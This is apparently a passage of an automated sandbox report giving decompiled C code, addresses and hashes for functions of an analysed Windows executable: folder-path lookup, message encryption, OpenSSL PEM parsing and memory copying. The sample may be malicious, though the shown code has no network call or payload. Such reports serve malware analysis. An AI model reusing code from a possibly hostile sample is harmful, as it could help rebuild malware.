                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                    • API String ID: 2574300362-2555811374
                                                                                                    • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                    • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                                    • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                    • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 73%
                                                                                                    			E0040CBA0(intOrPtr* __ecx, void* __eflags, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
                                                                                                    				char _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				char _v20;
                                                                                                    				intOrPtr _v24;
                                                                                                    				char _v28;
                                                                                                    				char _v44;
                                                                                                    				intOrPtr _v48;
                                                                                                    				char _v52;
                                                                                                    				char _v68;
                                                                                                    				intOrPtr _v72;
                                                                                                    				char _v76;
                                                                                                    				char _v92;
                                                                                                    				intOrPtr _v96;
                                                                                                    				intOrPtr* _v100;
                                                                                                    				char _v1124;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				void* _t127;
                                                                                                    				intOrPtr _t129;
                                                                                                    				void* _t150;
                                                                                                    				void* _t172;
                                                                                                    				void* _t173;
                                                                                                    				void* _t176;
                                                                                                    				void* _t178;
                                                                                                    				intOrPtr _t179;
                                                                                                    				void* _t181;
                                                                                                    				void* _t182;
                                                                                                    				void* _t183;
                                                                                                    				void* _t185;
                                                                                                    				void* _t189;
                                                                                                    				void* _t191;
                                                                                                    
                                                                                                    				_push(0xffffffff);
                                                                                                    				_push(0x4ca818);
                                                                                                    				_push( *[fs:0x0]);
                                                                                                    				 *[fs:0x0] = _t179;
                                                                                                    				_push(_t150);
                                                                                                    				_push(_t172);
                                                                                                    				_v100 = __ecx;
                                                                                                    				_push(0xffffffff);
                                                                                                    				_v8 = 1;
                                                                                                    				_v72 = 0xf;
                                                                                                    				_v76 = 0;
                                                                                                    				_v92 = 0;
                                                                                                    				E00413FF0(_t150,  &_v92,  &_a28, 0);
                                                                                                    				_v8 = 2;
                                                                                                    				_push(1);
                                                                                                    				_v48 = 0xf;
                                                                                                    				_v52 = 0;
                                                                                                    				_v68 = 0;
                                                                                                    				E004156D0(_t150,  &_v68, _t172, "\n");
                                                                                                    				_v8 = 3;
                                                                                                    				_push(3);
                                                                                                    				_v24 = 0xf;
                                                                                                    				_v28 = 0;
                                                                                                    				_v44 = 0;
                                                                                                    				E004156D0(_t150,  &_v44, _t172, "\\\\n");
                                                                                                    				_v8 = 4;
                                                                                                    				E0040F250( &_v92,  &_v44,  &_v68);
                                                                                                    				_t181 = _t179 - 0x458 + 4;
                                                                                                    				if(_v24 >= 0x10) {
                                                                                                    					L00422587(_v44);
                                                                                                    					_t181 = _t181 + 4;
                                                                                                    				}
                                                                                                    				_v8 = 2;
                                                                                                    				_v24 = 0xf;
                                                                                                    				_v28 = 0;
                                                                                                    				_v44 = 0;
                                                                                                    				if(_v48 >= 0x10) {
                                                                                                    					L00422587(_v68);
                                                                                                    					_t181 = _t181 + 4;
                                                                                                    				}
                                                                                                    				_push(1);
                                                                                                    				_v48 = 0xf;
                                                                                                    				_v52 = 0;
                                                                                                    				_v68 = 0;
                                                                                                    				E004156D0(_t150,  &_v68, _t172, " ");
                                                                                                    				_v8 = 5;
                                                                                                    				_push(6);
                                                                                                    				_v24 = 0xf;
                                                                                                    				_v28 = 0;
                                                                                                    				_v44 = 0;
                                                                                                    				E004156D0(_t150,  &_v44, _t172, "&#160;");
                                                                                                    				_v8 = 6;
                                                                                                    				E0040F250( &_v92,  &_v44,  &_v68);
                                                                                                    				_t182 = _t181 + 4;
                                                                                                    				if(_v24 >= 0x10) {
                                                                                                    					L00422587(_v44);
                                                                                                    					_t182 = _t182 + 4;
                                                                                                    				}
                                                                                                    				_v8 = 2;
                                                                                                    				_v24 = 0xf;
                                                                                                    				_v28 = 0;
                                                                                                    				_v44 = 0;
                                                                                                    				if(_v48 >= 0x10) {
                                                                                                    					L00422587(_v68);
                                                                                                    					_t182 = _t182 + 4;
                                                                                                    				}
                                                                                                    				_push(1);
                                                                                                    				_v48 = 0xf;
                                                                                                    				_v52 = 0;
                                                                                                    				_v68 = 0;
                                                                                                    				E004156D0(_t150,  &_v68, _t172, "/");
                                                                                                    				_v8 = 7;
                                                                                                    				_push(2);
                                                                                                    				_v24 = 0xf;
                                                                                                    				_v28 = 0;
                                                                                                    				_v44 = 0;
                                                                                                    				E004156D0(_t150,  &_v44, _t172, "\\/");
                                                                                                    				_v8 = 8;
                                                                                                    				_t171 =  &_v44;
                                                                                                    				E0040F250( &_v92,  &_v44,  &_v68);
                                                                                                    				_t183 = _t182 + 4;
                                                                                                    				if(_v24 >= 0x10) {
                                                                                                    					L00422587(_v44);
                                                                                                    					_t183 = _t183 + 4;
                                                                                                    				}
                                                                                                    				_v24 = 0xf;
                                                                                                    				_v28 = 0;
                                                                                                    				_v44 = 0;
                                                                                                    				if(_v48 >= 0x10) {
                                                                                                    					L00422587(_v68);
                                                                                                    					_t183 = _t183 + 4;
                                                                                                    				}
                                                                                                    				_v20 = E00451D30();
                                                                                                    				E0044F960(_t150, _t171, E00452510());
                                                                                                    				_t120 =  >=  ? _v92 :  &_v92;
                                                                                                    				_t151 = E004524A0(_t178,  >=  ? _v92 :  &_v92, _v76);
                                                                                                    				E00452ED0(_t121,  &_v20, 0, 0);
                                                                                                    				_t185 = _t183 + 0x1c;
                                                                                                    				if(E00450960(_t151, _t171, _v72 - 0x10) == 0) {
                                                                                                    					_t176 = E00420C62(_t151, _t171, _t172, E004527A0(_t171, __eflags, _v20));
                                                                                                    					_t127 = E00420C62(_t151, _t171, _t172, 0x82);
                                                                                                    					__eflags = _a24 - 0x10;
                                                                                                    					_t173 = _t127;
                                                                                                    					_t165 =  >=  ? _a4 :  &_a4;
                                                                                                    					_t129 = _a20 + 1;
                                                                                                    					_push(4);
                                                                                                    					_push(_v20);
                                                                                                    					_push(_t176);
                                                                                                    					_push( >=  ? _a4 :  &_a4);
                                                                                                    					E004525F0(_t129);
                                                                                                    					_t189 = _t185 + 0x20;
                                                                                                    					_v96 = _t129;
                                                                                                    					__eflags = _t129 - 0xffffffff;
                                                                                                    					if(_t129 != 0xffffffff) {
                                                                                                    						E0044F5E0(_t151);
                                                                                                    						E00451A60(_t171, _t178, _v20);
                                                                                                    						_t191 = _t189 + 8;
                                                                                                    						 *_v100 = _v96;
                                                                                                    					} else {
                                                                                                    						E00451FB0(_t151, _t173);
                                                                                                    						E00450670(E00450960(_t151, _t171, __eflags), _t173);
                                                                                                    						_push(_t173);
                                                                                                    						_push("Error encrypting message: %s\n");
                                                                                                    						_push(E00420E4D() + 0x40);
                                                                                                    						E00422408(_t151, _t173, _t176, __eflags);
                                                                                                    						_t191 = _t189 + 0x14;
                                                                                                    						_t176 = 0;
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					E00450670(_t124,  &_v1124);
                                                                                                    					_t191 = _t185 + 8;
                                                                                                    					_t176 = 0;
                                                                                                    				}
                                                                                                    				if(_v72 >= 0x10) {
                                                                                                    					L00422587(_v92);
                                                                                                    					_t191 = _t191 + 4;
                                                                                                    				}
                                                                                                    				_v72 = 0xf;
                                                                                                    				_v76 = 0;
                                                                                                    				_v92 = 0;
                                                                                                    				if(_a24 >= 0x10) {
                                                                                                    					L00422587(_a4);
                                                                                                    					_t191 = _t191 + 4;
                                                                                                    				}
                                                                                                    				_a24 = 0xf;
                                                                                                    				_a20 = 0;
                                                                                                    				_a4 = 0;
                                                                                                    				if(_a48 >= 0x10) {
                                                                                                    					L00422587(_a28);
                                                                                                    				}
                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                    				return _t176;
                                                                                                    			}




































                                                                                                    0x0040cba3
                                                                                                    0x0040cba5
                                                                                                    0x0040cbb0
                                                                                                    0x0040cbb1
                                                                                                    0x0040cbbe
                                                                                                    0x0040cbc0
                                                                                                    0x0040cbc1
                                                                                                    0x0040cbc4
                                                                                                    0x0040cbc6
                                                                                                    0x0040cbd6
                                                                                                    0x0040cbdd
                                                                                                    0x0040cbe4
                                                                                                    0x0040cbe8
                                                                                                    0x0040cbed
                                                                                                    0x0040cbf4
                                                                                                    0x0040cbfb
                                                                                                    0x0040cc02
                                                                                                    0x0040cc09
                                                                                                    0x0040cc0d
                                                                                                    0x0040cc12
                                                                                                    0x0040cc19
                                                                                                    0x0040cc20
                                                                                                    0x0040cc27
                                                                                                    0x0040cc2e
                                                                                                    0x0040cc32
                                                                                                    0x0040cc3a
                                                                                                    0x0040cc45
                                                                                                    0x0040cc4a
                                                                                                    0x0040cc51
                                                                                                    0x0040cc56
                                                                                                    0x0040cc5b
                                                                                                    0x0040cc5b
                                                                                                    0x0040cc5e
                                                                                                    0x0040cc66
                                                                                                    0x0040cc6d
                                                                                                    0x0040cc74
                                                                                                    0x0040cc78
                                                                                                    0x0040cc7d
                                                                                                    0x0040cc82
                                                                                                    0x0040cc82
                                                                                                    0x0040cc85
                                                                                                    0x0040cc8f
                                                                                                    0x0040cc96
                                                                                                    0x0040cc9d
                                                                                                    0x0040cca1
                                                                                                    0x0040cca6
                                                                                                    0x0040ccad
                                                                                                    0x0040ccb4
                                                                                                    0x0040ccbb
                                                                                                    0x0040ccc2
                                                                                                    0x0040ccc6
                                                                                                    0x0040ccce
                                                                                                    0x0040ccd9
                                                                                                    0x0040ccde
                                                                                                    0x0040cce5
                                                                                                    0x0040ccea
                                                                                                    0x0040ccef
                                                                                                    0x0040ccef
                                                                                                    0x0040ccf2
                                                                                                    0x0040ccfa
                                                                                                    0x0040cd01
                                                                                                    0x0040cd08
                                                                                                    0x0040cd0c
                                                                                                    0x0040cd11
                                                                                                    0x0040cd16
                                                                                                    0x0040cd16
                                                                                                    0x0040cd19
                                                                                                    0x0040cd23
                                                                                                    0x0040cd2a
                                                                                                    0x0040cd31
                                                                                                    0x0040cd35
                                                                                                    0x0040cd3a
                                                                                                    0x0040cd41
                                                                                                    0x0040cd48
                                                                                                    0x0040cd4f
                                                                                                    0x0040cd56
                                                                                                    0x0040cd5a
                                                                                                    0x0040cd62
                                                                                                    0x0040cd67
                                                                                                    0x0040cd6d
                                                                                                    0x0040cd72
                                                                                                    0x0040cd79
                                                                                                    0x0040cd7e
                                                                                                    0x0040cd83
                                                                                                    0x0040cd83
                                                                                                    0x0040cd8a
                                                                                                    0x0040cd91
                                                                                                    0x0040cd98
                                                                                                    0x0040cd9c
                                                                                                    0x0040cda1
                                                                                                    0x0040cda6
                                                                                                    0x0040cda6
                                                                                                    0x0040cdae
                                                                                                    0x0040cdb7
                                                                                                    0x0040cdc6
                                                                                                    0x0040cdd5
                                                                                                    0x0040cdde
                                                                                                    0x0040cde3
                                                                                                    0x0040cded
                                                                                                    0x0040ce1a
                                                                                                    0x0040ce21
                                                                                                    0x0040ce2c
                                                                                                    0x0040ce30
                                                                                                    0x0040ce35
                                                                                                    0x0040ce39
                                                                                                    0x0040ce3a
                                                                                                    0x0040ce3c
                                                                                                    0x0040ce3f
                                                                                                    0x0040ce40
                                                                                                    0x0040ce42
                                                                                                    0x0040ce47
                                                                                                    0x0040ce4a
                                                                                                    0x0040ce4d
                                                                                                    0x0040ce50
                                                                                                    0x0040ce82
                                                                                                    0x0040ce8d
                                                                                                    0x0040ce95
                                                                                                    0x0040ce9b
                                                                                                    0x0040ce52
                                                                                                    0x0040ce52
                                                                                                    0x0040ce5e
                                                                                                    0x0040ce66
                                                                                                    0x0040ce67
                                                                                                    0x0040ce74
                                                                                                    0x0040ce75
                                                                                                    0x0040ce7a
                                                                                                    0x0040ce7d
                                                                                                    0x0040ce7d
                                                                                                    0x0040cdef
                                                                                                    0x0040cdf7
                                                                                                    0x0040cdfc
                                                                                                    0x0040cdff
                                                                                                    0x0040cdff
                                                                                                    0x0040cea1
                                                                                                    0x0040cea6
                                                                                                    0x0040ceab
                                                                                                    0x0040ceab
                                                                                                    0x0040ceb2
                                                                                                    0x0040ceb9
                                                                                                    0x0040cec0
                                                                                                    0x0040cec4
                                                                                                    0x0040cec9
                                                                                                    0x0040cece
                                                                                                    0x0040cece
                                                                                                    0x0040ced5
                                                                                                    0x0040cedc
                                                                                                    0x0040cee3
                                                                                                    0x0040cee7
                                                                                                    0x0040ceec
                                                                                                    0x0040cef1
                                                                                                    0x0040cefb
                                                                                                    0x0040cf06

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc$__except_handler4_fprintf
                                                                                                    • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                    • API String ID: 1783060780-3771355929
                                                                                                    • Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                                    • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                                    • Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                                    • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 96%
                                                                                                    			E00463350(void* __ebx, void* __edx, void* __ebp, char _a4, intOrPtr* _a8) {
                                                                                                    				void* __edi;
                                                                                                    				intOrPtr _t12;
                                                                                                    				void* _t13;
                                                                                                    				char _t16;
                                                                                                    				intOrPtr _t19;
                                                                                                    				signed int _t22;
                                                                                                    				char _t35;
                                                                                                    				void* _t36;
                                                                                                    				char* _t37;
                                                                                                    				void* _t38;
                                                                                                    				intOrPtr* _t39;
                                                                                                    				intOrPtr* _t40;
                                                                                                    				char* _t41;
                                                                                                    				void* _t42;
                                                                                                    				char* _t43;
                                                                                                    
                                                                                                    				_t45 = __ebp;
                                                                                                    				_t38 = __edx;
                                                                                                    				_t34 = __ebx;
                                                                                                    				_t40 = _a4;
                                                                                                    				_t39 = _a8;
                                                                                                    				 *_t39 = 0;
                                                                                                    				if(_t40 == 0) {
                                                                                                    					L26:
                                                                                                    					return 1;
                                                                                                    				} else {
                                                                                                    					_t12 =  *_t40;
                                                                                                    					if(_t12 == 0 || _t12 == 0xa) {
                                                                                                    						goto L26;
                                                                                                    					} else {
                                                                                                    						_t13 = E00448190(_t40, "Proc-Type: ", 0xb);
                                                                                                    						_t60 = _t13;
                                                                                                    						if(_t13 == 0) {
                                                                                                    							__eflags =  *((char*)(_t40 + 0xb)) - 0x34;
                                                                                                    							if( *((char*)(_t40 + 0xb)) != 0x34) {
                                                                                                    								goto L5;
                                                                                                    							} else {
                                                                                                    								__eflags =  *((char*)(_t40 + 0xc)) - 0x2c;
                                                                                                    								if( *((char*)(_t40 + 0xc)) != 0x2c) {
                                                                                                    									goto L5;
                                                                                                    								} else {
                                                                                                    									_t41 = _t40 + 0xd;
                                                                                                    									__eflags = E00448190(_t41, "ENCRYPTED", 9);
                                                                                                    									if(__eflags == 0) {
                                                                                                    										_t16 =  *_t41;
                                                                                                    										__eflags = _t16 - 0xa;
                                                                                                    										if(_t16 == 0xa) {
                                                                                                    											L13:
                                                                                                    											__eflags =  *_t41;
                                                                                                    											if(__eflags != 0) {
                                                                                                    												_t42 = _t41 + 1;
                                                                                                    												__eflags = E00448190(_t42, "DEK-Info: ", 0xa);
                                                                                                    												if(__eflags == 0) {
                                                                                                    													_t43 = _t42 + 0xa;
                                                                                                    													__eflags = _t43;
                                                                                                    													_t37 = _t43;
                                                                                                    													_push(_t34);
                                                                                                    													while(1) {
                                                                                                    														_t35 =  *_t43;
                                                                                                    														__eflags = _t35 - 0x41;
                                                                                                    														if(_t35 < 0x41) {
                                                                                                    															goto L20;
                                                                                                    														}
                                                                                                    														__eflags = _t35 - 0x5a;
                                                                                                    														if(_t35 <= 0x5a) {
                                                                                                    															L22:
                                                                                                    															_t43 = _t43 + 1;
                                                                                                    															continue;
                                                                                                    														}
                                                                                                    														L20:
                                                                                                    														__eflags = _t35 - 0x2d;
                                                                                                    														if(_t35 == 0x2d) {
                                                                                                    															goto L22;
                                                                                                    														}
                                                                                                    														_t6 = _t35 - 0x30; // -48
                                                                                                    														__eflags = _t6 - 9;
                                                                                                    														if(_t6 <= 9) {
                                                                                                    															goto L22;
                                                                                                    														}
                                                                                                    														 *_t43 = 0;
                                                                                                    														_t19 = E0047ECD0(_t37);
                                                                                                    														 *_t39 = _t19;
                                                                                                    														 *_t43 = _t35;
                                                                                                    														_a4 = _t43 + 1;
                                                                                                    														_pop(_t36);
                                                                                                    														__eflags = _t19;
                                                                                                    														if(__eflags != 0) {
                                                                                                    															_t22 = E00464360( &_a4, _t39 + 4,  *((intOrPtr*)(_t19 + 0xc)));
                                                                                                    															asm("sbb eax, eax");
                                                                                                    															return  ~( ~_t22);
                                                                                                    														} else {
                                                                                                    															E004512D0(_t36, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x72, ".\\crypto\\pem\\pem_lib.c", 0x219);
                                                                                                    															__eflags = 0;
                                                                                                    															return 0;
                                                                                                    														}
                                                                                                    														goto L27;
                                                                                                    													}
                                                                                                    												} else {
                                                                                                    													E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x69, ".\\crypto\\pem\\pem_lib.c", 0x200);
                                                                                                    													__eflags = 0;
                                                                                                    													return 0;
                                                                                                    												}
                                                                                                    											} else {
                                                                                                    												goto L14;
                                                                                                    											}
                                                                                                    										} else {
                                                                                                    											while(1) {
                                                                                                    												__eflags = _t16;
                                                                                                    												if(__eflags == 0) {
                                                                                                    													break;
                                                                                                    												}
                                                                                                    												_t16 =  *((intOrPtr*)(_t41 + 1));
                                                                                                    												_t41 = _t41 + 1;
                                                                                                    												__eflags = _t16 - 0xa;
                                                                                                    												if(_t16 != 0xa) {
                                                                                                    													continue;
                                                                                                    												} else {
                                                                                                    													goto L13;
                                                                                                    												}
                                                                                                    												goto L27;
                                                                                                    											}
                                                                                                    											L14:
                                                                                                    											E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x70, ".\\crypto\\pem\\pem_lib.c", 0x1fd);
                                                                                                    											__eflags = 0;
                                                                                                    											return 0;
                                                                                                    										}
                                                                                                    									} else {
                                                                                                    										E004512D0(__ebx, _t38, _t39, __ebp, __eflags, 9, 0x6b, 0x6a, ".\\crypto\\pem\\pem_lib.c", 0x1f9);
                                                                                                    										__eflags = 0;
                                                                                                    										return 0;
                                                                                                    									}
                                                                                                    								}
                                                                                                    							}
                                                                                                    						} else {
                                                                                                    							E004512D0(__ebx, _t38, _t39, __ebp, _t60, 9, 0x6b, 0x6b, ".\\crypto\\pem\\pem_lib.c", 0x1f4);
                                                                                                    							L5:
                                                                                                    							return 0;
                                                                                                    						}
                                                                                                    					}
                                                                                                    				}
                                                                                                    				L27:
                                                                                                    			}


















                                                                                                    0x00463350
                                                                                                    0x00463350
                                                                                                    0x00463350
                                                                                                    0x00463351
                                                                                                    0x00463356
                                                                                                    0x0046335a
                                                                                                    0x00463362
                                                                                                    0x004634c7
                                                                                                    0x004634cd
                                                                                                    0x00463368
                                                                                                    0x00463368
                                                                                                    0x0046336c
                                                                                                    0x00000000
                                                                                                    0x0046337a
                                                                                                    0x00463382
                                                                                                    0x0046338a
                                                                                                    0x0046338c
                                                                                                    0x004633ab
                                                                                                    0x004633af
                                                                                                    0x00000000
                                                                                                    0x004633b1
                                                                                                    0x004633b1
                                                                                                    0x004633b5
                                                                                                    0x00000000
                                                                                                    0x004633b7
                                                                                                    0x004633b9
                                                                                                    0x004633ca
                                                                                                    0x004633cc
                                                                                                    0x004633eb
                                                                                                    0x004633ed
                                                                                                    0x004633ef
                                                                                                    0x004633fd
                                                                                                    0x004633fd
                                                                                                    0x00463400
                                                                                                    0x00463421
                                                                                                    0x00463430
                                                                                                    0x00463432
                                                                                                    0x00463451
                                                                                                    0x00463451
                                                                                                    0x00463454
                                                                                                    0x00463456
                                                                                                    0x00463457
                                                                                                    0x00463457
                                                                                                    0x00463459
                                                                                                    0x0046345c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0046345e
                                                                                                    0x00463461
                                                                                                    0x0046346f
                                                                                                    0x0046346f
                                                                                                    0x00000000
                                                                                                    0x0046346f
                                                                                                    0x00463463
                                                                                                    0x00463463
                                                                                                    0x00463466
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00463468
                                                                                                    0x0046346b
                                                                                                    0x0046346d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00463473
                                                                                                    0x00463476
                                                                                                    0x0046347e
                                                                                                    0x00463480
                                                                                                    0x00463483
                                                                                                    0x00463487
                                                                                                    0x00463488
                                                                                                    0x0046348a
                                                                                                    0x004634b5
                                                                                                    0x004634bf
                                                                                                    0x004634c5
                                                                                                    0x0046348c
                                                                                                    0x0046349c
                                                                                                    0x004634a4
                                                                                                    0x004634a8
                                                                                                    0x004634a8
                                                                                                    0x00000000
                                                                                                    0x0046348a
                                                                                                    0x00463434
                                                                                                    0x00463444
                                                                                                    0x0046344c
                                                                                                    0x00463450
                                                                                                    0x00463450
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004633f1
                                                                                                    0x004633f1
                                                                                                    0x004633f1
                                                                                                    0x004633f3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004633f5
                                                                                                    0x004633f8
                                                                                                    0x004633f9
                                                                                                    0x004633fb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004633fb
                                                                                                    0x00463402
                                                                                                    0x00463412
                                                                                                    0x0046341a
                                                                                                    0x0046341e
                                                                                                    0x0046341e
                                                                                                    0x004633ce
                                                                                                    0x004633de
                                                                                                    0x004633e6
                                                                                                    0x004633ea
                                                                                                    0x004633ea
                                                                                                    0x004633cc
                                                                                                    0x004633b5
                                                                                                    0x0046338e
                                                                                                    0x0046339e
                                                                                                    0x004633a7
                                                                                                    0x004633aa
                                                                                                    0x004633aa
                                                                                                    0x0046338c
                                                                                                    0x0046336c
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strncmp
                                                                                                    • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                    • API String ID: 909875538-2908105608
                                                                                                    • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                    • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                                    • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                    • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 81%
                                                                                                    			E004C5D39(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                    				intOrPtr _v12;
                                                                                                    				signed int _v16;
                                                                                                    				intOrPtr _v20;
                                                                                                    				signed int _v32;
                                                                                                    				unsigned int _v52;
                                                                                                    				signed int _v56;
                                                                                                    				signed int _v60;
                                                                                                    				signed int _t32;
                                                                                                    				signed int* _t34;
                                                                                                    				signed int _t36;
                                                                                                    				signed int _t42;
                                                                                                    				signed int _t47;
                                                                                                    				char* _t48;
                                                                                                    				signed int _t49;
                                                                                                    				signed int _t52;
                                                                                                    				unsigned int _t58;
                                                                                                    				signed int _t59;
                                                                                                    				signed int _t60;
                                                                                                    				void* _t63;
                                                                                                    				signed int _t66;
                                                                                                    				signed int _t73;
                                                                                                    				void* _t78;
                                                                                                    				char* _t79;
                                                                                                    				signed int _t80;
                                                                                                    				signed int _t81;
                                                                                                    				signed int _t83;
                                                                                                    				void* _t89;
                                                                                                    				void* _t93;
                                                                                                    
                                                                                                    				_t63 = __edx;
                                                                                                    				_t89 = _t93;
                                                                                                    				_t78 = E0042501F(__ebx);
                                                                                                    				if(_t78 != 0) {
                                                                                                    					_push(__ebx);
                                                                                                    					__eflags =  *(_t78 + 0x24);
                                                                                                    					if( *(_t78 + 0x24) != 0) {
                                                                                                    						L7:
                                                                                                    						_t79 =  *(_t78 + 0x24);
                                                                                                    						_t32 = E0042C0FD(_t79, 0x86, E004C5D13(_a4));
                                                                                                    						__eflags = _t32;
                                                                                                    						if(_t32 != 0) {
                                                                                                    							_push(0);
                                                                                                    							_push(0);
                                                                                                    							_push(0);
                                                                                                    							_push(0);
                                                                                                    							_push(0);
                                                                                                    							E004242FD(0x86, _t63);
                                                                                                    							asm("int3");
                                                                                                    							_push(_t89);
                                                                                                    							__eflags = _v32;
                                                                                                    							_push(_t79);
                                                                                                    							if(__eflags != 0) {
                                                                                                    								_t80 = _v16;
                                                                                                    								__eflags = _t80;
                                                                                                    								if(__eflags == 0) {
                                                                                                    									goto L10;
                                                                                                    								} else {
                                                                                                    									_t7 = _t80 - 1; // -1
                                                                                                    									_t36 = E0043FF8E(_v20, _t80, E004C5D13(_v12), _t7);
                                                                                                    									__eflags = _t36;
                                                                                                    									if(_t36 == 0) {
                                                                                                    										goto L11;
                                                                                                    									} else {
                                                                                                    										_push(0);
                                                                                                    										_push(0);
                                                                                                    										_push(0);
                                                                                                    										_push(0);
                                                                                                    										_push(0);
                                                                                                    										E004242FD(0x86, _t63);
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										asm("int3");
                                                                                                    										_t58 = _v52;
                                                                                                    										_push(0);
                                                                                                    										__eflags = _t58;
                                                                                                    										if(_t58 == 0) {
                                                                                                    											L34:
                                                                                                    											return _v60;
                                                                                                    										} else {
                                                                                                    											_push(_t80);
                                                                                                    											_push(0x86);
                                                                                                    											_t52 = _t58;
                                                                                                    											_t83 = _v56;
                                                                                                    											__eflags = _t83 & 0x00000003;
                                                                                                    											_t73 = _v60;
                                                                                                    											if((_t83 & 0x00000003) != 0) {
                                                                                                    												while(1) {
                                                                                                    													_t42 =  *_t83;
                                                                                                    													_t83 = _t83 + 1;
                                                                                                    													 *_t73 = _t42;
                                                                                                    													_t73 = _t73 + 1;
                                                                                                    													_t58 = _t58 - 1;
                                                                                                    													__eflags = _t58;
                                                                                                    													if(_t58 == 0) {
                                                                                                    														goto L26;
                                                                                                    													}
                                                                                                    													__eflags = _t42;
                                                                                                    													if(_t42 == 0) {
                                                                                                    														__eflags = _t73 & 0x00000003;
                                                                                                    														if((_t73 & 0x00000003) == 0) {
                                                                                                    															L30:
                                                                                                    															_t52 = _t58;
                                                                                                    															_t59 = _t58 >> 2;
                                                                                                    															__eflags = _t59;
                                                                                                    															if(_t59 != 0) {
                                                                                                    																goto L46;
                                                                                                    															} else {
                                                                                                    																goto L31;
                                                                                                    															}
                                                                                                    														} else {
                                                                                                    															while(1) {
                                                                                                    																 *_t73 = _t42;
                                                                                                    																_t73 = _t73 + 1;
                                                                                                    																_t58 = _t58 - 1;
                                                                                                    																__eflags = _t58;
                                                                                                    																if(_t58 == 0) {
                                                                                                    																	goto L49;
                                                                                                    																}
                                                                                                    																__eflags = _t73 & 0x00000003;
                                                                                                    																if((_t73 & 0x00000003) != 0) {
                                                                                                    																	continue;
                                                                                                    																} else {
                                                                                                    																	goto L30;
                                                                                                    																}
                                                                                                    																goto L50;
